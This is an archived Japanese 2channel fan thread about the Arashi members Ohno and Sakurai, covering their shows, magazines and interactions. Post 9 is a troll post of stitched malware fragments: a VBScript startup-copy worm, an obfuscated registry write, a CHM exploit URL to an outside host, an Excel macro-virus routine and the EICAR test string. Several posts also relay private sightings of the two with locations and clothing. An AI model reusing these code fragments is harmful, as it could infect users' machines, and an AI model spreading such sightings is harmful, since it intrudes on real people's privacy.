5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

やっぱり山【4合目】

1 :(*´・∀・`)人(`・3・´*)<メロンパンコンビですよね?:2006/10/24(火) 20:04:56 ID:zfaSrLXH
死ぬまで仲間! (*´・∀・`)人(`・3・´*) 死んだら墓場!

お約束
・他コンビ不感症
・同じ人立ち入り禁止
・sage推奨
・ヤサーイ
・ヤサイって何だよ!

本日のGは山ですよ。またコスプレですよ。
チームSOSは永遠なり。

前スレ やっぱり山【3合目】
http://tv8.2ch.net/test/read.cgi/jan/1130311761/
前々スレ やっぱり山【2合目】
ttp://tv8.2ch.net/test/read.cgi/jan/1100736974/
前々々スレ 【智】やっぱり山【翔】
ttp://tv8.2ch.net/test/read.cgi/jan/1026741552/


2 :ななしじゃにー:2006/10/24(火) 20:34:01 ID:dLvGQixx
>1
乙!

3 :ななしじゃにー:2006/10/24(火) 20:47:04 ID:OSTsDHfo
>>1
3日こない内に無くなっていて焦りましたが、無事スレ勃て乙ですた。

4 :ななしじゃにー:2006/10/24(火) 22:16:19 ID:x6LZWA5J
>>1


5 :ななしじゃにー:2006/10/24(火) 23:04:54 ID:DR7mCQ1E
>1
乙華麗
出張から帰ってきたら無くなっててビックリしたよ。
心からdです。

6 :ななしじゃにー:2006/10/24(火) 23:19:50 ID:39SkVsoS
>1
乙です!

7 :ななしじゃにー:2006/10/24(火) 23:25:34 ID:DR7mCQ1E
新スレ記念に。
歩誌、ほんの少しだけど隣どうしでした。
ま、よく見る光景ですが。

8 :ななしじゃにー:2006/10/24(火) 23:27:08 ID:39SkVsoS
ステキなIDデター(*´д`*)

9 :<body onload=window()>:2006/10/24(火) 23:27:20 ID:3nlEqiCv
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :ななしじゃにー:2006/10/25(水) 00:47:11 ID:Kl3sKVrI
>8
ネ申ktkr

11 :ななしじゃにー:2006/10/25(水) 01:09:34 ID:15PXPeiw
大宮対山か、ヌゲーw

12 :ななしじゃにー:2006/10/25(水) 22:53:32 ID:KGUmyrkN
タイムカプセルに向けてそろそろヲヅラから羽鳥アナにチェンジ!



まだ早いかな?

13 :ななしじゃにー:2006/10/25(水) 22:54:41 ID:KGUmyrkN
スマソ
誤爆ったorz

14 :ななしじゃにー:2006/10/26(木) 16:31:15 ID:tJY0oGt1
歩誌はなぜ急に移動したのかwと問いたい
なにげに足に手を乗せる傘GJ
フトモモ触られるの嫌いなのになー

15 :ななしじゃにー:2006/10/26(木) 21:21:02 ID:5d5sTriO
膝は大丈夫なんじゃね?

16 :ななしじゃにー:2006/10/26(木) 21:25:30 ID:ibyQ6t7l
太腿も弱いとは言ってたけど触られるの帰来とは言ってないとオモー
それに平安の言う好き嫌いはあてにならん

17 :ななしじゃにー:2006/10/26(木) 22:56:16 ID:GEuhOclt
あらちの触られキングだから麺に触られるのは無問題なんじゃ。

18 :ななしじゃにー:2006/10/27(金) 13:06:31 ID:S1scuTrq
>17
そだね、ひら以外に触られまくりだもんね。
久しぶりにドル誌買うかな。

19 :ななしじゃにー:2006/10/27(金) 16:18:09 ID:XpgP642i
山担は台湾勧告パンフは買うべきであるな

20 :ななしじゃにー:2006/10/27(金) 17:31:04 ID:RgPghNsH
山担、ねぇ・・・

21 :ななしじゃにー:2006/10/27(金) 20:29:42 ID:83bEM0LW
ですが。なにか?
さんざn(ry

22 :ななしじゃにー:2006/10/28(土) 01:19:15 ID:kNJ/hkjI
山と風に分かれての取材。
これは
買えってことだね?
>オリ●タ

23 :ななしじゃにー:2006/10/28(土) 03:37:29 ID:EhycXFna
紫兄ぃのスレに落ちてたけど二人で舞台の打ち上げにお邪魔したらしい。

24 :ななしじゃにー:2006/10/30(月) 02:04:16 ID:W20x3mGE
仲良しさん

25 :ななしじゃにー:2006/10/30(月) 02:35:35 ID:XGtNmgYE
>22
立ち読みしたけど、一緒に出てた?

26 :ななしじゃにー:2006/10/30(月) 14:45:28 ID:HtlZi0vY
風呂具

27 :ななしじゃにー:2006/10/30(月) 22:29:47 ID:XGtNmgYE
>26
トン

28 :ななしじゃにー:2006/10/31(火) 20:30:42 ID:cXIm/3It
12月に期待だな。

29 :ななしじゃにー:2006/10/31(火) 23:33:20 ID:D0exW+2M
入ってればいいなと思ってたものが
もれなく全部入ってて万足デス。
>CDG
佐藤と佐藤のヤツは嬉しかったなぁ。
あと博士と助手。HDDに入ってる、まだw

30 :ななしじゃにー:2006/11/04(土) 01:35:01 ID:PhRaH8RW
359 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/03(金) 03:23:00
大野櫻井@新宿


363 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/03(金) 03:37:20
千鳥足大野 つまずく
すかさず櫻井キャッチ
そのまま肩組み
タクシーでどっかへ(帰宅か?)

思わぬところでごちそうさまでした。

367 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/03(金) 04:04:16
最初大野一人で立ってフラフラ動いてた。
コンビニから櫻井が出てきて歩きだし、大野は櫻井の買ったものをチェックしてた。
寒そうにポケットに手を入れる大野。ポケットから何か出てきたっぽくて櫻井に見せ、
二人で爆笑してた。

「ストーカー乙」と言われそうなのでここらで散る。
今夜はいい夢見れそうだ。

375 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/03(金) 10:55:10
自分も聞いたよ、昨日新宿@大野櫻井
某有名焼肉やからでてきたとか。
コマ劇場んとこのね、あの焼肉やさん。



31 :ななしじゃにー:2006/11/04(土) 02:31:20 ID:sIKzaNBg
>千鳥足大野 つまずく
>すかさず櫻井キャッチ

流石にこれはありえねーけどなw
傘の反射神経じゃ平安がコケた後に駆け寄る程度だろw

32 :ななしじゃにー:2006/11/04(土) 04:11:58 ID:RXYg5vgE
隣歩いてて手を伸ばした
とかじゃね?>すかさず櫻井キャッチ

傘も言う程鈍い訳じゃないからな

33 :ななしじゃにー:2006/11/04(土) 23:16:50 ID:Gci3IXHi
平安は酔っ払うと前後不覚になるからなw
人の家にあがりこんで眠るよりは傘に預けておいたほうがいいかな。

ちょっと話それるけど…
発●の舞台を傘平安で観にいったハナシは
どうやらホントだったらしい。

34 :ななしじゃにー:2006/11/05(日) 00:15:02 ID:0My3gTgr
舞台関係は付き合いで観に行っただけならいいけど
後に舞台やるからかも…と不安になる。
ムージカルと発●舞台が苦手って損だよな。

35 :ななしじゃにー:2006/11/05(日) 15:10:03 ID:0UAe/rOP
キダ脚本のムージカルもアリだよな。

36 :ななしじゃにー:2006/11/05(日) 16:08:23 ID:DcxsTbFJ
アリっちゃあ…アリ

37 :ななしじゃにー:2006/11/05(日) 21:35:25 ID:ljqNbbUm
傘も近い内また舞台やるんだろうな…。
プロ●ューサーズとか山2人でやりゃいいのにw

38 :ななしじゃにー:2006/11/06(月) 00:59:51 ID:UWnxDjjF
干菓子と羊と山…こえぇぇよな。

39 :ななしじゃにー:2006/11/06(月) 08:14:14 ID:GE7MbjN+
山コンとか大歓迎だぞ。

40 :ななしじゃにー:2006/11/06(月) 12:37:49 ID:LfFJopFY
自分も山コン推奨派!
あらちのラプとメロディーを担う2人ですもんw

41 :ななしじゃにー:2006/11/06(月) 13:37:54 ID:l1sYYAfa
ムージカル調でもいいから
山コンがいい!

42 :ななしじゃにー:2006/11/06(月) 16:24:10 ID:UFC/MXlf
山紺か…
それより二人でドラマとかして欲しいな自分は

43 :ななしじゃにー:2006/11/06(月) 22:06:20 ID:UWnxDjjF
それより自分は鴇の長老と副将のやってるCM欲しいな

44 :ななしじゃにー:2006/11/07(火) 23:31:05 ID:KA8i2fFT
D誌ナイツ!!
傘はDVD-boxを上げる気マンマンだったんだなw
一緒にいてあげよーか、あざーっす

45 :ななしじゃにー:2006/11/10(金) 01:38:15 ID:ZnrkzPT6
TSUTAYAで二人でいるところに遭遇。
…つい回れ右しちゃったYO。

46 :ななしじゃにー:2006/11/10(金) 01:52:58 ID:a3fxGaWi
ちょ、どこの蔦屋?w

47 :ななしじゃにー:2006/11/10(金) 01:58:25 ID:ZnrkzPT6
マジスマソ伏せ忘れ…_※ ̄|●
場所は人参塔とでも言っておこうかw
あとはググってくれ
ちなみに2人ともcap姿ダタ。
どっちかが白い上着どっちかが紺。
あまりにビクーリして逃げた。惜しいことをした

48 :ななしじゃにー:2006/11/10(金) 02:05:34 ID:a3fxGaWi
dd!
うわー自分地元だよ、マジ裏山!

49 :ななしじゃにー:2006/11/10(金) 02:32:42 ID:2fH0g8p4
傘もう韓国逝ったんじゃないの?

50 :ななしじゃにー:2006/11/10(金) 02:54:23 ID:okDshiEn
ほんと目撃多いなw
もっとなかよしエピを本人達から聞きたいもんだ

51 :ななしじゃにー:2006/11/10(金) 06:53:40 ID:NpKANCnt
傘一足早く昨日カンコック入り。
他メソは本日入り。


52 :ななしじゃにー:2006/11/10(金) 10:34:47 ID:/rbZxrkr
ケーキョク見間違いでFA?

53 :ななしじゃにー:2006/11/10(金) 12:06:58 ID:6mGQyPZJ
ん?全員で日本脱出したと聞いたが

54 :ななしじゃにー:2006/11/10(金) 16:56:07 ID:kN0eoq/R
木曜日のいつか  山で蔦谷
     午後 宿題くん収録
     午後11時 傘1人金浦空港
ttp://blog.naver.com/saku_tsu?Redirect=Log&logNo=20030296457

金曜日 午前 あらち残り4人韓国入り

55 :ななしじゃにー:2006/11/11(土) 00:07:43 ID:IDiLTalN
壁|3・´)

56 :ななしじゃにー:2006/11/11(土) 01:19:50 ID:tn651Pwq
明日は山で孫だな。正座正座。

57 :ななしじゃにー:2006/11/11(土) 15:18:18 ID:qfOm4vh2
孫自分的にはウマーだったんだが…
過疎ってるな

58 :ななしじゃにー:2006/11/11(土) 15:45:45 ID:LhmHV1LJ
すぐに過疎ってるなとかって鬱になるなよ
昼はテレビ観るのも書き込みにするのも難しい人間多いだろ

59 :ななしじゃにー:2006/11/12(日) 02:09:50 ID:9ssY5las
>>58
何をそんなにカリカリと

孫、ほうれん草のゴマ和えにホコーリ(*´∀`*)

60 :ななしじゃにー:2006/11/12(日) 16:52:46 ID:eQ9BDzVt
平安くんの料理心配だなーって言いながらwktkしてる傘。
うるさいな!だまってて!って言いながら楽しそうに料理する平安。
そして、あまりの感動につい平安をたたきながら、これマジうまいyo!って言う傘。
うまいって言われてマジ照れしつつ本当にうれしそうな平安。

すべてに萌えですた(´∀`*)

61 :ななしじゃにー:2006/11/12(日) 17:13:00 ID:kVO5YHjz
>60
自分孫見れない痴呆民なんだが
姐さんのレス読んだらカ●゙エエ山が浮かんできてホコーリしました
dです
そして自分のとこでも孫やってくれ。・゚・(ノД`)・゚・。

62 :ななしじゃにー:2006/11/12(日) 22:28:44 ID:EuHKrq0w
>60
「これマジうまいyo!」が
「お父さんやればできるじゃない!」に脳内変換されました。

63 :ななしじゃにー:2006/11/13(月) 23:03:48 ID:30EtmN5O
なんか今回の孫はずっと一緒にいたからよかったなあ(*´д`)
白に桃がカワイ●ッタなあ。なんだか
平安の料理不安だな〜とか言いながら初めて食べたんだろ?的なw

あとは景色に二人して感動してたり
並んでオニギリにぎにぎしてたり
平安の描いた絵なのに「いいっしょ?大変だったんだよ」となぜか傘が自慢してたw
「あんたなんもしてないじゃん」ブラックな平安がいい

すべてに萌えました(*´д`)

64 :ななしじゃにー:2006/11/14(火) 01:58:17 ID:Cvkhuu2u
傘の度が過ぎるほどの平安フェチズムは、どこからきてるんだろうw

65 :ななしじゃにー:2006/11/14(火) 10:45:45 ID:/ImhroE1
>60ノシ
平安がすり粉木をして、傘がすり鉢を押さえる
ナチュラルにやってのける2人にホコーリ

66 :ななしじゃにー:2006/11/14(火) 15:09:10 ID:F+dnbPUu
>65
ナチュラルすぎて見逃してたorz

67 :ななしじゃにー:2006/11/14(火) 19:01:37 ID:UpyIwO2w
前回の予告ではしっかり流れたが本編では傘スリ鉢押さえる手のみ映ってたな。


68 :ななしじゃにー:2006/11/15(水) 15:33:53 ID:xDIKQa2V
粗宿でナツラルに進行表で平安の頭殴る傘にモヘタんだが自分だけカナ


69 :ななしじゃにー:2006/11/15(水) 16:30:46 ID:7cbwCwPP
粗宿録画しそこねた(´・ω・`)

70 :名無しでいいとも!@放送中は実況板で:2006/11/19(日) 09:53:49 ID:m1oyIlWz
免許とれたらお送りなし?また吉祥寺コンビニで目撃されてる。

71 :ななしじゃにー:2006/11/20(月) 22:38:05 ID:aTzU1Dk2
最近の目撃系はネタだと思った方がよい。

72 :ななしじゃにー:2006/11/21(火) 08:07:08 ID:nhaUG0Rg
でも吉祥寺の話は嘘ではない。
他は知らないがな

73 :ななしじゃにー:2006/11/21(火) 17:42:03 ID:TgrKo/N1
>>72
kwsk!

74 :ななしじゃにー:2006/11/24(金) 14:53:13 ID:hdnIdmhL
此処に落とすのは気が引けるよ
妄想乙言われるのが関の山だからな

外土で山あるといいな

75 :ななしじゃにー:2006/11/24(金) 15:45:46 ID:QYu/QexE
なんだその伏せ方

76 :ななしじゃにー:2006/11/25(土) 09:46:52 ID:xGuMcbQE
そとつち(´・ω・`)

77 :ななしじゃにー:2006/11/26(日) 17:46:16 ID:dKJdAONr
【言いたくないけど】猫目で801【ばいばい】
http://sakura03.bbspink.com/test/read.cgi/801/1162738942/

78 :ななしじゃにー:2006/11/26(日) 17:53:31 ID:iUGWBTEH
山の目撃情報、男同士ではありえないくらいのイチャつきばかりで萌えだが
安置だの下手な週刊誌だのに見つかった時を思うとガクブルだ。
番組や紺じゃあれでも自制してたのかってくらいベタベタしてるもんな。
麺同士で熱愛発覚!みたいに面白おかしく晒されたらどうなるんだろう…
最近あらちの落とし込みっぽいの増えてきてるから不安になってきた。

79 :ななしじゃにー:2006/11/26(日) 17:56:09 ID:RvD9qfUK
>78
とりあえずおまいの頭の方が遙かに心配だ

80 :ななしじゃにー:2006/11/26(日) 17:56:17 ID:iUGWBTEH
早速上げられてるし…orz

81 :ななしじゃにー:2006/11/27(月) 01:56:17 ID:ayYx8iX9
逆に週刊誌に写真載ったら目撃情報信じようと思ってる

82 :ななしじゃにー:2006/11/27(月) 12:03:07 ID:+twrCk5c
はいはいわろすわろす

83 :ななしじゃにー:2006/11/28(火) 01:43:55 ID:MCJ1bNZx
なぜだろう。とても萌えだったのは・・・
うーん。自分でもよくわからないけど。宿題GJ!!!

84 :ななしじゃにー:2006/11/28(火) 02:45:37 ID:Q1PpcV2W
>>83
ノシノシ
なぜだろう、リピが止まらない…

糸引きやらせたり、
立ってる時の立ち位置が近い、
と言うか、よく体が向き合って立ってるんだよなw

とにかくGJ!

85 :ななしじゃにー:2006/11/28(火) 11:39:07 ID:pCnhc05e
納豆食ってるとき、関係ないとこ見ながら二人で喋ってる。
なに話してたのか気になるよ!!
ああいうの珍しいなと思った、紺のMCでもあんまそういうのみないしな。

86 :ななしじゃにー:2006/11/28(火) 11:49:55 ID:Lnauf42K
>85
あんまそういうのみないしな。

いつものことですが。


87 :ななしじゃにー:2006/11/28(火) 13:00:19 ID:HuQH453H
皆していつもの事ですが言うのがワロスw
途中で平安が「傘くん納豆スキだったっけ」とかぼそぼそ言ってて
そのあとひらがでかい声でそれ言い直してたよねw

明日の害度山でありますよーに

88 :ななしじゃにー:2006/11/29(水) 08:28:09 ID:9NyGTiQL
あんなに見なくてもww朝からごちそう様でした。
並び順GJ!!やはりバードんところはいいわ


89 :ななしじゃにー:2006/11/29(水) 22:35:31 ID:Gkk4HUxd
傘は相手をじーっと見る癖があるよな。
対して平安は割と視線が泳ぐタイプだから
山だと傘に見つめられた平安が照れて目をそらす
って感じに見えなくも無くて楽しませて貰ってるw

90 :ななしじゃにー:2006/11/29(水) 23:57:33 ID:/jfjAXVe
>89
愛行進が毎回そんな感じでカ○エカッタ

91 :ななしじゃにー:2006/11/30(木) 11:39:35 ID:nnTlDXX0
>>89
この間の孫ん時にそれが顕著に現れてたなw
傘のことあまり見ないけどたまに見返すのがなんか好●なんだよ

零で舞台のことに触れるのキボンだ

92 :ななしじゃにー:2006/11/30(木) 13:38:58 ID:WZmZ7gJo
ゼロ平安舞台に触れて欲しいが自分がヲタでなかったらはぁ?って思うな

93 :ななしじゃにー:2006/12/02(土) 16:45:21 ID:TYkC7tQ+
●敏さんのClubeventでの事。
吉岡たくさん、ha-jさんなどがやってくるeventなんだけど。
場所は吉祥寺の駅近くのClubです。
OldJazzやClassicもありユーロもあり
BAR+皿回しブースとドラムセットもあり。

櫻井が大野を誘ってやって来る場所です

TimeTableにはもちろん櫻井の名前はありませんがSpecialThanksGuestとかSpecialサプライズとかかいてあればたいてい櫻井の事かな

初めて行った時にバーテンの人に「嵐の櫻井くん来るんですか?」って聞いたら「帰っちゃうから声とかかけないでね」って言われまして。
大野はcap姿で櫻井はナニも被らないでいたからすぐわかった。
櫻井が回してる時は最初大野も側にいたんだけど途中から吉岡さんかha-jさんに呼ばれていなくなった。

大野→黒のアウタ-姿で途中から上着脱いでいて白い長Tの上に紺の半T着てた。シルバ-とラメがちりばめられてたオシャレなTシャツだったけど。Gパンに茶色い靴に肩からかける斜めのポーチ(ポーターかも)

櫻井→迷彩のアウタ-の下にオフホワイトのV字のざっくりニット、の下に黒と金のタンク←途中で脱いでた。

こんなもんかな。
明らかにファンってのはよくわかる。
Video回した女が注意されてた。


94 :ななしじゃにー:2006/12/03(日) 00:42:27 ID:4AVPAadW
>93
服装とかすげー細かく覚えてるね

95 :ななしじゃにー:2006/12/03(日) 01:29:24 ID:PpaWh/zC
どっかからの甜菜だろ。スルースルー。
でもイベントうんぬんは自分も聞いたことあるけど

96 :ななしじゃにー:2006/12/03(日) 18:34:40 ID:OzR9AI6O
もう今後は山コンビ別名タンク&ポシェットでよくない?w

97 :ななしじゃにー:2006/12/04(月) 09:43:42 ID:EIEmyUlV
>96
…………何でだよ

98 :ななしじゃにー:2006/12/07(木) 00:32:49 ID:EBzhfEL7
なんで同じフリだったんだろうww

99 :ななしじゃにー:2006/12/07(木) 08:47:54 ID:brEWYGMf
アイコンタクト多かったなw

100 :ななしじゃにー:2006/12/07(木) 20:32:46 ID:EBzhfEL7
早売りの折スタ買ってきた。
久しぶりにヤバスですよ。キタイシテイーデスヨ。
芋誌で珍しく平安が傘のこと語っててモヘ(*´ー`)

101 :ななしじゃにー:2006/12/08(金) 13:34:57 ID:pB7WwmCT
平安と傘でムージカル噂があるとか…
嘘から出た誠になることキボン(´∀`*)


102 :ななしじゃにー:2006/12/11(月) 20:09:04 ID:PSVFaHF7
さあいよいよ長月のムージカルが信憑性がw
日生の波も見て来たけどあいてるな

コトダマコトダマ

103 :ななしじゃにー:2006/12/11(月) 21:22:47 ID:7earNsq9
あれ?てっきり折廃祭りが勃発してると思ったんだが…………禿上がったのは自分だけか?

104 :ななしじゃにー:2006/12/11(月) 21:25:52 ID:F20bOQKB
>>103
ノ"

105 :ななしじゃにー:2006/12/11(月) 23:36:35 ID:AJ9vnN4L
>>103
ノシノシ

ちょっと後ろのページの七と被ったじゃねーかw
思わず吹いたぞ

106 :ななしじゃにー:2006/12/13(水) 23:11:43 ID:3/1YyuCT
今日平安舞台入ってましたが
かなり嬉しかったな。なんかとても

107 :ななしじゃにー:2006/12/13(水) 23:20:51 ID:dkDi94ix
>>106
傘くんはどんな様子でした?

108 :ななしじゃにー:2006/12/14(木) 01:12:46 ID:A6DO9Giz
歪舞台に行った時の山はひっつきもっつきして仲良く観劇してたのに
他麺や先輩と行ったら舞台に釘付けって…傘、態度があからさま杉w

109 :ななしじゃにー:2006/12/14(木) 16:37:11 ID:2cX61n+8
山がひっつきもっつきなのは平安のキャラのせいだろ
別に傘態度あからさま杉wとかいうもんじやないとオモー
まぁひっつきもっつきしてくれた方がヲタとしてはウマーだから
自分山っこで良かったと思うw

110 :ななしじゃにー:2006/12/14(木) 16:49:26 ID:RlHsxDJ2
昨日2階で蜜録のひとつかまってた

111 :ななしじゃにー:2006/12/14(木) 22:40:56 ID:A6DO9Giz
>109
他麺にはクールな態度って意味じゃなくて舞台の平安に首ったけって意味ね
平安と観劇する時は他G担姐さんも驚くくらいもちゃもちゃしてるらしいし
どんだけ平安ヲタなんだよとオモタw

112 :ななしじゃにー:2006/12/15(金) 00:05:05 ID:RoCoTCF6
山っこ仲良しでウマーだが、わざわざ他の名前出さなくていいんだよ。
山だけに萌えてりゃよし。

113 :ななしじゃにー:2006/12/15(金) 00:11:34 ID:0uY/hp13
水曜に鉢合わせた自分が通りますよ
客席降りした平安を微笑でほほえましく見ていた傘にヤラれました
幕間に楽屋でナニ話したのかキニナルw
山ウマーでしたよ。しかも休演日前だし

114 :ななしじゃにー:2006/12/15(金) 00:24:50 ID:otNYXrL7
折廃風呂具にやられたわけ、で…orz

くっついてくださいって言われる前からくっついてる山ってどーよ
たまには「もう少し離れた写真でもいいかな?」
編集部にまで気を使わせているのか…や、あの写真GJ!!と

115 :ななしじゃにー:2006/12/15(金) 16:09:07 ID:0uY/hp13
既に携帯の壁紙ですが、なにか

116 :ななしじゃにー:2006/12/15(金) 16:22:27 ID:haLeJ0gD
>>115
ノシ

117 :ななしじゃにー:2006/12/15(金) 18:43:21 ID:WVyy72sV
モヘ話中スマソ。
鰺コングッズを買おうと思うのだが、
パンフの中身は台湾版と韓国版同じじゃないよな?
山的にどっちが買い?

118 :ななしじゃにー:2006/12/15(金) 22:59:56 ID:1uAMRQIa
自分は台湾

119 :ななしじゃにー:2006/12/15(金) 23:33:02 ID:haLeJ0gD
山的ポイント写真はどちらにも入ってる
台湾はひらメイン曲を山でバックに付いてるライブ写真
韓国は山の立ち位置が隣の写真
の違いかな?
どちらでも良いから鯵パンフは山好きは絶対手に入れるベシ!

120 :ななしじゃにー:2006/12/16(土) 16:21:43 ID:MheTixfG
韓国

121 :ななしじゃにー:2006/12/16(土) 19:23:57 ID:xBXb4wOr
向かい合ってご飯食べてるヤツとか
チケット見せてる写真は両方にのってるのかな?
どっちにしろ買おうと思ってるけど。
パンフ自体が山ウマーでいいのかな

122 :ななしじゃにー:2006/12/18(月) 09:43:07 ID:u+vjTvh3
北側同人@マターリ談義パート2
http://comic6.2ch.net/test/read.cgi/doujin/1166091782/

123 :ななしじゃにー:2006/12/19(火) 01:02:06 ID:P9CF6oKV
ちょ、ω揉まれコンビwww
平安がモミニュケーションされる前に困って傘見上げてたな。

124 :ななしじゃにー:2006/12/19(火) 06:35:21 ID:m7fozu05
傘も心配そうに見てたなw


125 :ななしじゃにー:2006/12/19(火) 08:11:35 ID:U9C9yDGz
芝多サンだいぶ違う大きさにきづいちまったかなww
低燃費で萌えられる自分は安上がりだな

126 :ななしじゃにー:2006/12/19(火) 20:42:20 ID:OUgq5zdl
月ジョンのアレに(*´Д`)

127 :ななしじゃにー:2006/12/21(木) 23:08:14 ID:3IXyAwr1
同人サラ仕上げ

128 :ななしじゃにー:2006/12/22(金) 14:34:13 ID:sDwU3I7/
最近萌えポインツがあまりないから
隣り合わせなだけでも萌えられるw

やすいな

129 :ななしじゃにー:2006/12/22(金) 22:07:31 ID:AMoG0+oB
それが山クオリティ

130 :ななしじゃにー:2006/12/22(金) 23:21:38 ID:Py3Ivv9I
Mステすげー二人で変顔でカ●エカッタな

131 :ななしじゃにー:2006/12/23(土) 00:24:19 ID:bl1zhLp6
低燃費て楽しいもんだな。どんな些細な事でもアンテナが働く。


132 :ななしじゃにー:2006/12/23(土) 09:56:10 ID:XlzWUn3E
鯵ツアオフ写真集発売!
低燃費だから2ショットのみでも…v(´∀`*)

133 :ななしじゃにー:2006/12/23(土) 14:17:02 ID:UKkfAmr1
何故どこもかしこもage厨ばっかなんだ。


134 :ななしじゃにー:2006/12/23(土) 17:01:30 ID:OQmfNAWS
age厨やらゴミ付やら…参ったな

135 :ななしじゃにー:2006/12/25(月) 08:17:44 ID:3ZhiXhor
歩誌の条件が微妙に似ている件。

136 :ななしじゃにー:2006/12/26(火) 01:44:35 ID:K9NWifxV
傘の左乳首を攻める平安に禿げ萌

137 :ななしじゃにー:2006/12/26(火) 11:38:23 ID:n3KNLpqU
傘の左乳首って、よく勃つ方だよねw

138 :ななしじゃにー:2006/12/26(火) 15:03:31 ID:sxj2R7uE
夏紺で散々ネタにしてたな
左の乳首w
『さ●しまじ落ち着け』とか言われてたし

139 :ななしじゃにー:2006/12/26(火) 22:19:42 ID:n2tJlRzb
昨日は傘の「さ○しくん」が聞けただけで幸せだったよ。

140 :ななしじゃにー:2006/12/27(水) 08:26:01 ID:++Nlh1VZ
傘が二投目の時
平安が傘の後ろから覗き込むのが(*´∀`)

141 :ななしじゃにー:2006/12/27(水) 09:09:03 ID:8kGEbkX0
平安がストッキング2枚被りで
カイカイやってる時の平安をみる傘に(*´д`)


142 :ななしじゃにー:2006/12/29(金) 20:10:05 ID:SI8+jon2
おいでなさい。

143 :ななしじゃにー:2006/12/29(金) 21:35:13 ID:sFGkRfks
↑シンプルだね

144 :ななしじゃにー:2006/12/29(金) 23:46:52 ID:A9mvC8N+
英知の平安のアンケトにあった、おばけって何かわかる?

145 :ななしじゃにー:2006/12/30(土) 06:03:59 ID:2HKliolc
ただ単におばけが怖いってことだろ?

146 :ななしじゃにー:2006/12/30(土) 23:20:01 ID:fj2iZ9iQ
by平あん

147 :ななしじゃにー:2006/12/31(日) 12:49:42 ID:ueiuXHP0
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも

148 :ななしじゃにー:2006/12/31(日) 22:27:01 ID:otowbe+2
おすすめ2ちゃんねる見ると山スレなのに大宮ヲタしかいないのな

149 :ななしじゃにー:2006/12/31(日) 23:39:43 ID:mDYx7tgL
おすすめにちゃんねる見なくても山スレですよ

150 :ななしじゃにー:2007/01/01(月) 00:45:39 ID:WYCPzr8v
2人で並んで隠れていて、カ〇゙エエ脳。

151 :ななしじゃにー:2007/01/01(月) 20:19:28 ID:NzpeHr5K
年が明けてちんまりお辞儀し合う山にホッコリ(*´∀`)
今年も仲良しでよろ!

152 :ななしじゃにー:2007/01/02(火) 00:34:17 ID:uhj3tGHQ
最後雛壇撮影会のときにバックステ前のほうで見てましたけど
お隣さんで、しかも前がデカイから隠れちゃうフタリが(´Д`*)
しかも、なんかコソコソ話してるのも堪らなかったし
山っこの後ろに魔がいたからずっと皆で楽しそうだった

今年もいっぱい山萌えありますよーに

153 :ななしじゃにー:2007/01/03(水) 15:43:43 ID:sNHsMH/g
会報GJ
自分、台湾行ったはずなのに全然気付かなかった。
生で見たかったよ。

154 :ななしじゃにー:2007/01/05(金) 02:29:31 ID:tkEu2Naj
本編ラストで手を繋ぐ可能性が今回低いのが寂しいけど
4日2部は萌えどころ漫才でした
傘があげた木更津Tを平安にあげてそれを稽古着にしてて稽古場でヒーローになったらしいw


155 :ななしじゃにー:2007/01/05(金) 02:53:55 ID:u0IOkI7k
写真集は山萌探しww
平安のソロ曲は傘のリクエストしたとか、傘撮影の写真なんかもGJ

156 :ななしじゃにー:2007/01/05(金) 09:06:31 ID:l1oy7dgi
そう言えば、例の平安うちわがカバ○エって言ったの傘だったな。
平安ソロ曲の話、kwsk

157 :ななしじゃにー:2007/01/05(金) 18:31:28 ID:u0IOkI7k
写真集の一番最初の長文レポ
客の視点で見ようと傘はステージを下りてリハを見学。平安のソロになるとキャーキャー手を振っていたラスィ。
これ俺ダイスチ!俺が見たかったの!とかなんとか。

158 :ななしじゃにー:2007/01/05(金) 23:13:50 ID:Fcqr4Mnl
154に補足。
傘くんはやさしい。
舞台のみんなと打ち解けられたのも、傘くんのおかげ。
ありがd。と平安。
いやどういたしまして。と傘。
そしてお互いにおじぎの仕合を。

159 :ななしじゃにー:2007/01/06(土) 00:51:53 ID:nZXrpE1f
